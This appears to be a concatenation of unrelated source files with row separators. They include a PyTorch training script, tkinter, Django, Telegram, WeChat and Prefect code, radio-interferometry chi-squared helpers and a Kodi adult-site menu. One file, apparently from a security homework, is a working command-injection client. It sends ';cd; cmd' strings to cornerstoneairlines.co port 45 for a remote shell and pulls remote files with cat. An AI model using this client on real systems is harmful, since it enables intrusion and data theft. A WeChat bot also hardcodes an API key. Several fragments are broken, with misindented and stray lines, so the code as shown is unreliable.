    pbar.close()
    return accuracy, np.mean(losses)
def run_val_epoch(network, data_iterator):
    """Evaluate the network on `data_iterator`; returns the overall accuracy."""
    network.eval()
    accuracy = 0
    correct = 0
    total = 0
    pbar = tqdm()
    pbar.reset(total=len(data_iterator))
    with torch.no_grad():
        for _, data in enumerate(data_iterator):
            (_,p1, p2, p3, p4, a1, a2), y = data
            y = y - 1 # gold index
            story = torch.cat((p1,p2,p3,p4),1)
            outcome, _, _ = network(story,[a1,a2])
            # update metrics
            predicted = torch.argmax(outcome, 1)
            correct += (predicted == y).sum().item()
            total += y.size(0)
            accuracy = float(correct / total) if correct > 0 else 0
            #print
            pbar.set_postfix({'Acc':accuracy})
            pbar.update()
    pbar.close()
    return accuracy
def run_training(path_training, path_val, path_model, top_k, required_explanation):
    """Full training loop: load config/data/embeddings, train for 10 epochs,
    checkpoint whenever validation accuracy improves, optionally run the
    explanation evaluation each epoch.
    """
    #get configuration from dict and user
    # NOTE(review): the config file handle is never closed — consider `with`.
    config_dict = yaml.safe_load(open("config.yaml", 'r'))
    controller_config = ControllerConfig(**config_dict['controller'])
    memory_config = MemoryConfig(**config_dict['memory'])
    training_parameters = TrainingConfig(**config_dict['training'])
    # get available device
    DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    train_dataset = functions.get_cloze_dataset(path_training)
    val_dataset = functions.get_cloze_dataset(path_val)
    train_iterator = torchtext.data.Iterator(train_dataset,batch_size=training_parameters.batch_size, train=True, shuffle=True, device=DEVICE)
    val_iterator = torchtext.data.Iterator(val_dataset,batch_size=training_parameters.batch_size, train=False, sort=False,device=DEVICE)
    # Get Embedding (pre-trained vectors saved alongside the vocab)
    vocab = torch.load("dataset/vocab")['vocab']
    embedding_pretrained_weights = vocab.vectors
    pre_trained_embeddings = torch.as_tensor(embedding_pretrained_weights).to(DEVICE)
    padding_index=1
    embedding_dim = len(embedding_pretrained_weights[0])
    #init model — embeddings are copied in and left trainable
    network = model.ClozeModel(controller_config, memory_config, embedding_dim,len(pre_trained_embeddings),dropout=training_parameters.dropout).to(DEVICE)
    network.embeddings.weight.data.copy_(pre_trained_embeddings)
    network.embeddings.weight.requires_grad = True
    explanation_mod = core.dnc.explanation.ExplanationModule(padding_value=padding_index,top_k=top_k)
    loss_function = nn.CrossEntropyLoss()
    optimizer = optim.Adam(network.parameters(), lr=training_parameters.learning_rate, eps=1e-7)
    # initialize variables (epoch count is hard-coded to 10)
    top1_acc = 0.0
    for epoch in range(1,11):
        print("Running epoch {}".format(epoch))
        _,_ = run_training_epoch(network,train_iterator,loss_function,optimizer,training_parameters.max_grad_norm)
        print("Validation epoch {}".format(epoch))
        accuracy = run_val_epoch(network,val_iterator)
        if required_explanation:
            print("Explaining training dataset")
            run_explanations(network,explanation_mod,train_iterator)
            print("Explain validation dataset")
            run_explanations(network,explanation_mod,val_iterator)
        if accuracy > top1_acc:
            # New best validation accuracy: persist a full checkpoint.
            top1_acc = accuracy
            print("saving model...")
            checkpoint = {'controller_config':config_dict['controller'], 'memory_config':config_dict['memory'],
                          'state_dict':network.state_dict(), 'len_embeddings':len(pre_trained_embeddings)}
            torch.save(checkpoint, path_model)
def main(argv):
    """absl entry point: unpack the CLI flags and launch training."""
    run_training(
        FLAGS.path_training,
        FLAGS.path_val,
        FLAGS.path_model,
        FLAGS.top_k,
        FLAGS.use_surrogate,
    )
    print("Training process ended! The new model is stored on {}.".format(FLAGS.path_model))
print("Training process ended! The new model is stored on {}.".format(path_model))
if __name__ == '__main__':
absl.app.run(main) |
5,111 | a4d47b9a28ec66f6a0473498674ebc538d909519 | import tkinter.ttk
import tkinter as tk
def update_info(info_t, data):
    # TODO: not implemented — intended to refresh the treeview rows (x/y, etc.)
    # with new simulation data; earlier selection/delete experiments removed.
    pass
def path_to_string(s):
    """Format a path (sequence of (x, y) pairs) as "x1, y1 > x2, y2 > ...".

    Returns "" for an empty path.

    BUG FIX: the original looped to len(s)-1 and then re-appended s[i] — it
    duplicated the second-to-last point, dropped the final one, and raised
    NameError on a single-point path.
    """
    return " > ".join("{}, {}".format(point[0], point[1]) for point in s)
def read_file_formatting(self, patrol, target):
    """Build one table row per patrol ship for the info treeview.

    Row layout: [x, y, current detections, total detections,
    per-target detection times..., knot, detection range, path string].
    NOTE(review): written as a method (uses self.path_to_string) although a
    module-level path_to_string also exists — confirm which is intended.
    """
    data = []
    # Pre-allocate rows of zeros: len(target) detection slots + 7 fixed fields.
    for i in range(len(patrol)):
        data.append([])
        for j in range(len(target)+7):
            data[i].append(0)
    for i in range(len(patrol)):
        data[i][0] = patrol[i].get_x()
        data[i][1] = patrol[i].get_y()
        # current detections
        data[i][2] = 0
        # total detections
        data[i][3] = 0
        # path (rendered as a string)
        data[i][-1] = self.path_to_string(patrol[i].get_path())
        # detection range
        data[i][-2] = patrol[i].get_detection_dist()
        # Knot (speed)
        data[i][-3] = patrol[i].get_knot()
        # target detection time
        for j in range(len(target)):
            data[i][4+j] = 0
    return data
def init_info(frame_i, init_data):
    """Create and populate the "Ship Info" treeview inside `frame_i`.

    `init_data` is the row-per-ship table produced by read_file_formatting;
    each attribute (X, Y, detections, ...) becomes one treeview row with one
    column per ship. Returns the treeview widget.
    """
    ## setting info
    info_lbl = tk.Label(frame_i, text="Ship Info")
    info_lbl.pack()
    # setting treeView (column labels are "함정 N" = "Ship N")
    info_tree = tk.ttk.Treeview(frame_i, columns=["함정 1", "함정 2", "함정 3"], displaycolumns=["함정 1", "함정 2", "함정 3"])
    info_tree.pack()
    # column #0: attribute name ("속성" = attribute)
    info_tree.column("#0", width=30, anchor="center")
    info_tree.heading("#0", text="속성")
    # column #1: ship 1
    info_tree.column("#1", width=70, anchor="w")
    info_tree.heading("#1", text="함정 1", anchor="center")
    # column #2: ship 2
    info_tree.column("#2", width=70, anchor="w")
    info_tree.heading("#2", text="함정 2", anchor="center")
    # column #3: ship 3
    info_tree.column("#3", width=70, anchor="w")
    info_tree.heading("#3", text="함정 3", anchor="center")
    ## insert table: one row per attribute, values gathered across ships.
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][0])
    info_tree.insert('', "end", text="X", values=data, iid="x")
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][1])
    info_tree.insert('', "end", text="Y", values=data, iid="y")
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][2])
    # NOTE(review): from here on, `i` in the iid is the leftover index of the
    # preceding loop (always len(init_data)-1) — consistent at runtime but
    # fragile; confirm whether a fixed suffix was intended.
    info_tree.insert('', "end", text="Now_d", values=data, iid="nd" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][3])
    info_tree.insert('', "end", text="Total_d", values=data, iid="td" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][4])
    info_tree.insert('', "end", text="T1", values=data, iid="t1" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][5])
    info_tree.insert('', "end", text="T2", values=data, iid="t2" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][6])
    info_tree.insert('', "end", text="T3", values=data, iid="t3" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][7])
    info_tree.insert('', "end", text="Knot", values=data, iid="knot" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][8])
    info_tree.insert('', "end", text="D_range", values=data, iid="dr" + str(i))
    data = []
    for i in range(len(init_data)):
        data.append(init_data[i][9])
    info_tree.insert('', "end", text="Path", values=data, iid="path" + str(i))
    # (large block of commented-out per-row insertion experiments removed)
    return info_tree
|
5,112 | 15539d824490b7ae4724e7c11949aa1db25ecab2 | #!/user/bin/env python
# -*- coding: utf-8 -*-
# @Author : XordenLee
# @Time : 2019/2/1 18:51
import itchat
import requests
import sys
default_api_key = 'bb495c529b0e4efebd5d2632ecac5fb8'
def send(user_id, input_text, api_key=None):
    """Send *input_text* to the Tuling chatbot API and return the parsed JSON reply.

    Falls back to the module-level ``default_api_key`` when *api_key* is falsy.
    """
    payload = {
        "reqType": 0,
        "perception": {
            "inputText": {"text": input_text},
            "selfInfo": {
                "location": {"city": "北京", "province": "北京"},
            },
        },
        "userInfo": {
            "apiKey": api_key or default_api_key,
            "userId": user_id,
        },
    }
    response = requests.post('http://openapi.tuling123.com/openapi/api/v2', json=payload)
    return response.json()
@itchat.msg_register(itchat.content.TEXT)
def text_reply(msg):
    # Handler for incoming WeChat text messages: forward the text to the
    # Tuling bot and return its reply (itchat sends the return value back).
    print(msg.FromUserName[-9:], msg.text)
    # A slice of the sender id is used as the Tuling userId — presumably to
    # satisfy the API's userId length limit; confirm against Tuling docs.
    req = send(msg.FromUserName[1: 32], msg.text)
    a = req.get('results')
    # NOTE(review): assumes 'results' is a non-empty list with a text payload;
    # a Tuling error response would make the next line raise — verify.
    b = a[0]['values']['text']
    print(msg.get('ToUserName')[-9:],b)
    return b
itchat.auto_login(hotReload=True)
itchat.run()
|
5,113 | 6c825cb60475a1570e048cab101567bd5847d2c2 | from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseNotFound
from django.template import RequestContext
from bgame.models import Game, Period, Player, ROLES
from bgame.forms import GameForm
import logging
log = logging.getLogger(__name__)
def index(request):
    # Landing page: every game, the role choices, and the new-game form.
    games = Game.objects.all()
    return render_to_response('index.html', {'games': games, 'roles': ROLES, 'form': GameForm},
            context_instance=RequestContext(request))
def game(request, game_slug, role):
    """Render the game page for one player role within a game.

    Looks up the Game, the Player for ``role`` in that game, and the
    player's most recent Period (highest number).
    """
    game_ = get_object_or_404(Game, game_slug=game_slug)
    player = get_object_or_404(Player, game__game_slug=game_slug, role=role)
    period = Period.objects.filter(player__game=game_).filter(player__role=role).order_by('-number')[0]
    # Bug fix: the context previously passed the *view function* ``game``
    # to the template instead of the fetched ``game_`` instance.
    return render_to_response('game.html', {'game': game_, 'player': player,
            'period': period}, context_instance=RequestContext(request))
def html(request):
    # AJAX endpoint returning HTML fragments; the ``template`` GET parameter
    # selects which partial to render. (Python 2 file: print statements.)
    data = request.GET
    if 'template' in data:
        if data['template'] == 'game_listing':
            games = Game.objects.all()
            return render_to_response('game_listing.html', {'games': games, 'roles': ROLES,},
                    context_instance=RequestContext(request))
        if data['template'] == 'period_listing':
            # NOTE(review): assumes 'game_slug' and 'role' are present in the
            # query string — a missing key raises KeyError here; confirm callers.
            periods = Period.objects.filter(player__game__game_slug=data['game_slug']).filter(player__role=data['role']).exclude(number=0).order_by('-number')
            print 'number of periods found: %d' % (periods.count(),)
            return render_to_response('period_listing.html', {'periods': periods}, context_instance=RequestContext(request))
    print 'template not in data'
    return HttpResponseNotFound()
|
5,114 | 789f95095346262a04e7de0f9f9c5df6177e8fbc | # -*- coding: utf-8 -*-
import json
from django.conf import settings
from pdf_generator.utils import build_pdf_stream_from
from django.http import JsonResponse
from helpers.views import ApiView
from pdf_generator.forms import PdfTempStoreForm
from pdf_generator.serializers import PdfTempStoreSerializer
class ReportPdfView(ApiView):
    """
    Build a PDF export of an interview report.

    The posted payload is persisted to a short-lived PdfTempStore row so the
    headless renderer can fetch it by UUID; the rendered PDF stream is
    returned and the temporary row deleted afterwards.
    """

    def post(self, request, *args, **kwargs):
        # Expected payload: {"domain": <public hostname>, "data": <report payload>}.
        data = json.loads(request.body)
        domain = data["domain"]
        data = data["data"]
        print("-- Build Report PDF Export --")
        print()
        # persist params in PdfTemp
        store = PdfTempStoreForm({"data": data})
        if store.is_valid():
            store_instance = store.save()
        else:
            return JsonResponse({"error": "Pdf data is invalid"})
        uuid = PdfTempStoreSerializer(store_instance).data["uuid"]
        # "nginx" is the renderer-side hostname — presumably the docker-compose
        # service name; the public domain is passed along as a query param.
        url = (
            f"http://nginx/#/compte-rendu-entretien/rapport/{uuid}/pdf?domain={domain}"
        )
        # Early display pdf URL
        if settings.DEBUG:
            print(
                "================================================================================"
            )
            print(url.replace("nginx", domain))
            print(
                "================================================================================"
            )
        pdf = build_pdf_stream_from(url)
        # Temp row is only needed while the renderer fetches it.
        store_instance.delete()
        return pdf
|
5,115 | f9f66452756cb67689d33aeb2e77535086355a7d | import telebot
import os
from misc.answers import answer_incorrect, answer_correct, answer_start
from helper import get_challenge_text, get_solved_challenge_text, is_correct_answer
bot = telebot.TeleBot(os.environ.get('API_KEY_TELEGRAM'))
default_parse_mode = "Markdown"
@bot.message_handler(commands=['start'])
def welcome(message):
    # /start handler: greet the user with the canned intro text.
    print("/start detected")
    print("[------------------------------]")
    bot.send_message(message.chat.id, answer_start)
@bot.message_handler(commands=['new_game'])
def new_game(message):
    """Handle /new_game: build a challenge from the command text and send it.

    ``get_challenge_text`` raises ValueError for malformed input; the error
    text is sent back to the user instead of a challenge.
    """
    print(f"try new game with message: {message.text}")
    try:
        answer = get_challenge_text(message.text)
        print("Challenge successfully created")
    except ValueError as exception:
        # Bug fix: send_message expects a string — previously the exception
        # object itself was assigned as the reply text.
        answer = str(exception)
        print(f"ValueError occurred: {exception}")
    bot.send_message(message.chat.id, answer, parse_mode=default_parse_mode)
    print("[------------------------------]")
@bot.message_handler(content_types=['text'])
def message_listener(message):
    """Handle replies to a challenge message: check the answer and respond.

    Only messages that are replies are processed; the replied-to message
    holds the challenge being answered.
    """
    reply_message = message.reply_to_message
    if reply_message is not None:
        print(f"Try to answer with: {message.text}")
        try:
            if is_correct_answer(message.text, reply_message):
                answer = answer_correct
                solved_challenge = get_solved_challenge_text(reply_message.text)
                # set challenge status
                bot.edit_message_text(chat_id=reply_message.chat.id, message_id=reply_message.message_id,
                                      text=solved_challenge,
                                      parse_mode=default_parse_mode)
                print("Correct answer")
            else:
                answer = answer_incorrect
                print("Incorrect answer")
        except Exception as exception:
            # Bug fix: reply_to expects a string, not the exception object.
            # NOTE(review): every failure lands here and is logged as
            # "Already solved" — consider narrowing this except clause.
            answer = str(exception)
            print("Already solved")
        print("[------------------------------]")
        bot.reply_to(message, answer)
# RUN
print("Bot started!")
print("[------------------------------]")
bot.polling(none_stop=True)
|
5,116 | e0f25addad8af4541f1404b76d4798d2223d9715 | """
Use the same techniques such as (but not limited to):
1) Sockets
2) File I/O
3) raw_input()
from the OSINT HW to complete this assignment. Good luck!
"""
import socket
import re
import time
host = "cornerstoneairlines.co" # IP address here
port = 45 # Port here
def execute_cmd(cmd):
    """
    Dispatch one operator command against the remote bind shell.

    Supported commands:
      shell                   - interactive pseudo-shell (cwd tracked locally)
      pull <remote> <local>   - download a remote file via ``cat``
      help                    - print usage
      quit                    - return -1 so the caller's loop exits

    Returns 0 to keep the main loop running, -1 to stop. (Python 2 file:
    uses ``raw_input``.)
    """
    # First word is the command; the next two words are optional path args.
    regex = re.match('^\s*(\w*)\s*([A-Za-z0-9.\/\-\_]*)\s*([A-Za-z0-9.\/\-\_]*)\s*$', cmd)
    val = regex.group(1)
    # print('val: %s' % val)
    if val == 'shell':
        path = '/'
        while True:
            usr_in = raw_input(path + ">")
            if usr_in == 'exit':
                break
            # The remote service keeps no state between connections, so every
            # command is prefixed with a cd to the locally tracked path.
            command = ';' + ' cd ' + path + '; ' + usr_in
            if ('cd' in usr_in):
                # print('here')
                reg = re.match('^\s*cd\s*([A-Za-z0-9.\/\-\_]*)\s*$', usr_in)
                if (reg.group(1) == ''):
                    path = '/'
                elif (reg.group(1)[0] == '/'):
                    path = reg.group(1)
                else:
                    path += reg.group(1)
                if (path[-1] != '/'):
                    path += '/'
            # print('command: "%s"' % command)
            # One fresh connection per command; the banner is read (and
            # discarded) before sending, with sleeps to let the service respond.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            data = s.recv(1024)
            time.sleep(2)
            # print('%s' % data)
            s.send(command + '\n')
            time.sleep(2)
            # print('"%s" sent' % command)
            data = s.recv(1024)
            print('%s' % data)
            s.close()
    elif val == 'pull':
        command = '; ' + 'cat ' + regex.group(2)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        data = s.recv(1024)
        time.sleep(2)
        s.send(command + '\n')
        time.sleep(2)
        # print('"%s" sent' % command)
        data = s.recv(1024)
        # print('%s' % data)
        s.close()
        # NOTE(review): only one 1024-byte recv — larger remote files will be
        # truncated; confirm this is acceptable.
        f = open(regex.group(3), 'w')
        f.write(data)
        f.close()
    elif val == 'quit':
        return -1
    elif val == 'help':
        print('shell - Drop into an interactive shell - exit with "exit"')
        print('pull <remote path> <local path> - download files')
        print('help - show the help menu')
        print('quit - quit this program')
    else:
        print('invalid command')
    return 0
if __name__ == '__main__':
    # Simple REPL: read a command and dispatch until 'quit' returns -1.
    while True:
        cmd = raw_input('>')
        if execute_cmd(cmd) == -1:
            break
|
5,117 | 607f0aac0d6d2c05737f59803befcff37d559398 | #!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: Jack
@datetime: 2018/8/31 13:32
@E-mail: zhangxianlei117@gmail.com
"""
def isValid(s):
    """Return True iff every bracket in *s* is closed in the correct order.

    Non-bracket characters are ignored; an empty string is valid.
    """
    pairs = {')': '(', ']': '[', '}': '{'}
    pending = []
    for ch in s:
        if ch in '([{':
            pending.append(ch)
        elif ch in pairs:
            # A closer must match the most recent unmatched opener.
            if not pending or pending.pop() != pairs[ch]:
                return False
    return not pending
if __name__ == '__main__':
    # print() call form works on both Python 2 and 3 — the old statement
    # form made this file a SyntaxError under Python 3.
    print(isValid("{[]}"))
|
5,118 | ea3217be80b6d1d3a400139bc4a91870cd2f1d87 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 14 20:35:10 2020
@author: Johanna
"""
import numpy as np
###############################################################################
# Complex Visibility Functions
###############################################################################
def compute_vis(X, F):
    """Complex visibilities of image vector X under DFT matrix F.

    Computes X @ F.T and casts the result to complex64.
    """
    product = np.asarray(X) @ np.asarray(F).T
    return product.astype(np.complex64)
def compute_vis_grad(vis, Z, F):
    """Real part of the negative gradient of the visibility residual.

    residual = vis - F·Z ; gradient = -Re(Fᴴ · residual).
    """
    residual = vis - compute_vis(Z, F)
    return (-np.matmul(np.conjugate(F.T), residual)).real
def chisq_vis(vis, Z, F, sigma):
    """Mean chi-squared between *vis* and the model visibilities of Z."""
    residual = compute_vis(Z, F) - vis
    return np.sum(np.abs(residual / sigma) ** 2) / (2 * len(vis))
###############################################################################
# Visibility Amplitude Functions
###############################################################################
def compute_amp(X, F):
    """Visibility amplitudes |F · X| of image vector X."""
    model_vis = np.dot(F, X)
    return np.absolute(model_vis)
def compute_amp_grad(amp, Z, A, sigma):
    """Gradient of the visibility-amplitude chi-squared w.r.t. image Z.

    amp   : measured amplitudes
    Z     : model image vector
    A     : DFT matrix
    sigma : per-visibility uncertainties
    """
    model = np.dot(A, Z)
    model_amp = np.abs(model)
    # Residual weighting, divided back by the complex visibility so the
    # phase cancels in the final real projection.
    weight = (amp - model_amp) * model_amp / (sigma ** 2) / model
    return (-2.0 / len(amp)) * np.real(np.dot(weight, A))
def chisq_amp(amp, Z, F, sigma):
    """Reduced chi-squared between *amp* and the model amplitudes of Z."""
    residual = (amp - compute_amp(Z, F)) / sigma
    return np.sum(np.abs(residual) ** 2) / len(amp)
###############################################################################
# Closure Phase Functions
###############################################################################
def compute_cphase(X, F_cphase):
    """Closure phase of image X over one baseline triangle.

    F_cphase stacks the three baseline DFT matrices along its last axis;
    the closure phase is the angle of the bispectrum v1*v2*v3.
    """
    A1, A2, A3 = (F_cphase[:, :, k] for k in range(3))
    row = np.asarray(X).reshape((1, -1))
    v1 = (row @ A1.T).astype(np.complex64)
    v2 = (row @ A2.T).astype(np.complex64)
    v3 = (row @ A3.T).astype(np.complex64)
    return np.angle(v1 * v2 * v3)
def compute_cphase_grad(cphase, Z, F_cphase, sigma, npix):
    '''
    Compute gradient of closure phase chi-squared
    cphase : closure phase of true image
    Z : predicted image vector
    F_cphase : 3 DFT matrices from three baselines in a closure triangle
    sigma : closure-phase uncertainties
    npix : image side length; the gradient is returned flattened to npix**2
    '''
    # Get fourier matrices of each baseline
    A1 = F_cphase[:, :, 0]
    A2 = F_cphase[:, :, 1]
    A3 = F_cphase[:, :, 2]
    # Model visibilities of Z on each leg of the triangle.
    i1 = np.matmul(Z.reshape((1,-1)), np.transpose(A1)).astype(np.complex64)
    i2 = np.matmul(Z.reshape((1,-1)), np.transpose(A2)).astype(np.complex64)
    i3 = np.matmul(Z.reshape((1,-1)), np.transpose(A3)).astype(np.complex64)
    cphase_samples = np.angle(i1 * i2 * i3)
    # Derivative of the (1 - cos(residual)) loss, distributed over the legs;
    # dividing by each visibility turns the angle derivative into Im(·/v).
    pref = np.sin(cphase - cphase_samples)/(sigma**2)
    pt1 = pref/i1
    pt2 = pref/i2
    pt3 = pref/i3
    out = -(2.0/len(cphase)) * np.imag(np.dot(pt1, A1) + np.dot(pt2, A2) + np.dot(pt3, A3))
    return out.reshape(npix**2)
def chisq_cphase(cphase, Z, F_cphase, sigma_cphase):
    """Closure-phase reduced chi-squared, in the (1 - cos residual) form."""
    residual = cphase - compute_cphase(Z, F_cphase)
    return (2.0 / len(cphase)) * np.sum((1.0 - np.cos(residual)) / (sigma_cphase ** 2))
###############################################################################
# Closure Amplitude Functions
###############################################################################
def compute_camp(X, Amatrices):
    """Closure amplitude |v1*v2 / (v3*v4)| of image X over a baseline quad.

    Amatrices holds the four baseline DFT matrices.
    """
    v1, v2, v3, v4 = (np.dot(Amatrices[k], X) for k in range(4))
    return np.abs((v1 * v2) / (v3 * v4))
def compute_camp_grad(camp, Z, Amatrices, sigma):
    """
    The gradient of the closure amplitude chi-squared
    camp: Closure amplitudes of true image
    Z: Predicted image vector
    Amatrices: DFT matrices of four baselines
    sigma: closure-amplitude uncertainties
    """
    # Model visibilities on the four baselines of the quadrangle.
    i1 = np.dot(Amatrices[0], Z)
    i2 = np.dot(Amatrices[1], Z)
    i3 = np.dot(Amatrices[2], Z)
    i4 = np.dot(Amatrices[3], Z)
    camp_samples = np.abs((i1 * i2)/(i3 * i4))
    pp = ((camp - camp_samples) * camp_samples)/(sigma**2)
    # Numerator baselines get +, denominator baselines get -.
    pt1 = pp/i1
    pt2 = pp/i2
    pt3 = -pp/i3
    pt4 = -pp/i4
    out = (np.dot(pt1, Amatrices[0]) +
           np.dot(pt2, Amatrices[1]) +
           np.dot(pt3, Amatrices[2]) +
           np.dot(pt4, Amatrices[3]))
    return (-2.0/len(camp)) * np.real(out)
def chisq_camp(camp, Z, Amatrices, sigma):
    """Closure-amplitude reduced chi-squared of image Z against *camp*."""
    v1, v2, v3, v4 = (np.dot(Amatrices[k], Z) for k in range(4))
    model = np.abs((v1 * v2) / (v3 * v4))
    return np.sum(np.abs((camp - model) / sigma) ** 2) / len(camp)
###############################################################################
# Log Closure Amplitude Functions
###############################################################################
def compute_lgcamp(X, Amatrices):
    """Log closure amplitude: log|v1| + log|v2| - log|v3| - log|v4|."""
    logs = [np.log(np.abs(np.dot(Amatrices[k], X))) for k in range(4)]
    return logs[0] + logs[1] - logs[2] - logs[3]
def compute_lgcamp_grad(lgcamp, Z, Amatrices, sigma):
    """The gradient of the Log closure amplitude chi-squared

    lgcamp: log closure amplitudes of the true image
    Z: predicted image vector
    Amatrices: DFT matrices of the four baselines
    sigma: log-closure-amplitude uncertainties
    """
    # Model visibilities on the four baselines.
    i1 = np.dot(Amatrices[0], Z)
    i2 = np.dot(Amatrices[1], Z)
    i3 = np.dot(Amatrices[2], Z)
    i4 = np.dot(Amatrices[3], Z)
    lgcamp_samples = (np.log(np.abs(i1)) +
                      np.log(np.abs(i2)) -
                      np.log(np.abs(i3)) -
                      np.log(np.abs(i4)))
    pp = (lgcamp - lgcamp_samples) / (sigma**2)
    # d(log|v|)/dZ contributes A/v; numerator legs +, denominator legs -.
    pt1 = pp / i1
    pt2 = pp / i2
    pt3 = -pp / i3
    pt4 = -pp / i4
    out = (np.dot(pt1, Amatrices[0]) +
           np.dot(pt2, Amatrices[1]) +
           np.dot(pt3, Amatrices[2]) +
           np.dot(pt4, Amatrices[3]))
    return (-2.0/len(lgcamp)) * np.real(out)
def chisq_lgcamp(lgcamp, X, Amatrices, sigma):
    """Reduced chi-squared between *lgcamp* and the log closure amps of X."""
    logs = [np.log(np.abs(np.dot(Amatrices[k], X))) for k in range(4)]
    model = logs[0] + logs[1] - logs[2] - logs[3]
    return np.sum(np.abs((lgcamp - model) / sigma) ** 2) / (len(lgcamp))
return chisq
|
5,119 | 7f52354487f85a0bf1783c8aa76f228ef17e6d6b | import datetime
import pendulum
import requests
from prefect import task, Flow, Parameter
from prefect.engine.signals import SKIP
from prefect.tasks.notifications.slack_task import SlackTask
from prefect.tasks.secrets import Secret
city = Parameter(name="City", default="San Jose")
api_key = Secret("WEATHER_API_KEY")
@task(max_retries=2, retry_delay=datetime.timedelta(seconds=5))
def pull_forecast(city, api_key):
    """
    Extract the 5-day 3-hour forecast for the provided City.

    Returns the parsed OpenWeatherMap JSON payload.
    """
    base_url = "http://api.openweathermap.org/data/2.5/forecast?"
    url = base_url + "appid=" + api_key + "&q=" + city
    r = requests.get(url)
    # Fail the task (triggering Prefect retries) on any HTTP error status.
    r.raise_for_status()
    data = r.json()
    return data
@task
def is_raining_tomorrow(data):
    """
    Given a list of hourly forecasts, returns a boolean specifying
    whether there is rain in tomorrow's forecast.

    Raises SKIP (so downstream tasks are skipped) when no rain is found.
    """
    # Bug fix: the date string was computed but never bound, so the
    # ``tomorrow`` reference below raised NameError.
    tomorrow = pendulum.now("utc").add(days=1).strftime("%Y-%m-%d")
    rain = [
        w
        for forecast in data["list"]
        for w in forecast["weather"]
        if w["main"] == "Rain" and forecast["dt_txt"].startswith(tomorrow)
    ]
    if not bool(rain):
        raise SKIP("There is no rain in the forecast for tomorrow.")
    # Return the documented boolean instead of falling off the end.
    return True
notification = SlackTask(
message="There is rain in the forecast for tomorrow - better take your umbrella out!",
webhook_secret="DAVID_SLACK_URL",
)
with Flow("Umbrella Flow") as flow:
forecast = pull_forecast(city=city, api_key=api_key)
rain = is_raining_tomorrow(forecast)
notification.set_upstream(rain)
|
5,120 | 15bcfd8859322034ec76a8c861d2151153ab54af | import sys
import shutil
import urllib
import urlparse
from shutil import copyfile

# Bug fix: xbmc.executebuiltin / xbmc.translatePath are used below but the
# xbmc module was never imported, so every dispatch branch raised NameError.
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
base_url = sys.argv[0]
addon_handle = int(sys.argv[1])
args = urlparse.parse_qs(sys.argv[2][1:])
addon = xbmcaddon.Addon()
xbmcplugin.setContent(addon_handle, 'videos')
def build_url(query):
    """Build a plugin:// callback URL for this addon from a query dict."""
    return '{0}?{1}'.format(base_url, urllib.urlencode(query))
xxxmenu = xbmcaddon.Addon('plugin.video.xxxmenu')
addon_icon = 'special://home/addons/plugin.video.xxxmenu/icon.png'
recycle_icon = 'special://home/addons/plugin.video.xxxmenu/recycle.png'
pandamovies_icon = 'special://home/addons/plugin.video.xxxmenu/pandamovie.png'
mangoporn_icon = 'special://home/addons/plugin.video.xxxmenu/mangoporn.png'
streamingporn_icon = 'special://home/addons/plugin.video.xxxmenu/streamingporn.png'
sexkino_icon = 'special://home/addons/plugin.video.xxxmenu/sexkino.png'
pornkino_icon = 'special://home/addons/plugin.video.xxxmenu/pornkino.png'
sexuria_icon = 'special://home/addons/plugin.video.xxxmenu/sexuria.png'
mode = args.get('mode', None)
if mode is None:
url = build_url({'mode': 'xxxmenu', 'foldername': '[COLOR blue][B]XXX MENU[/B][/COLOR]'})
li = xbmcgui.ListItem('[COLOR blue][B]XXX MENU[/B][/COLOR]', iconImage=addon_icon)
li.setInfo(type='video', infoLabels={'plot': '[COLOR blue][B]XXX MENU[/B][/COLOR]'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'mangoporn', 'foldername': 'Mangoporn'})
li = xbmcgui.ListItem('Mangoporn', iconImage=mangoporn_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.mangoporn.net'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'pandamovies', 'foldername': 'Pandamovies'})
li = xbmcgui.ListItem('Pandamovies', iconImage=pandamovies_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.pandamovies.pw'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'pornkino', 'foldername': 'Pornkino'})
li = xbmcgui.ListItem('Pornkino', iconImage=pornkino_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.pornkino.to'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'sexkino', 'foldername': 'Sexkino'})
li = xbmcgui.ListItem('Sexkino', iconImage=sexkino_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.sexkino.to'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'sexuria', 'foldername': 'Sexuria'})
li = xbmcgui.ListItem('Sexuria', iconImage=sexuria_icon)
li.setInfo(type='video', infoLabels={'plot': 'www.sexuria.com'})
li.setArt({'fanart': xxxmenu.getAddonInfo('fanart')})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=url,
listitem=li, isFolder=False)
url = build_url({'mode': 'streamingporn', 'foldername': 'Streamingporn'})
li = xbmcgui.ListItem('Streamingporn', iconImage=streamingporn_icon)
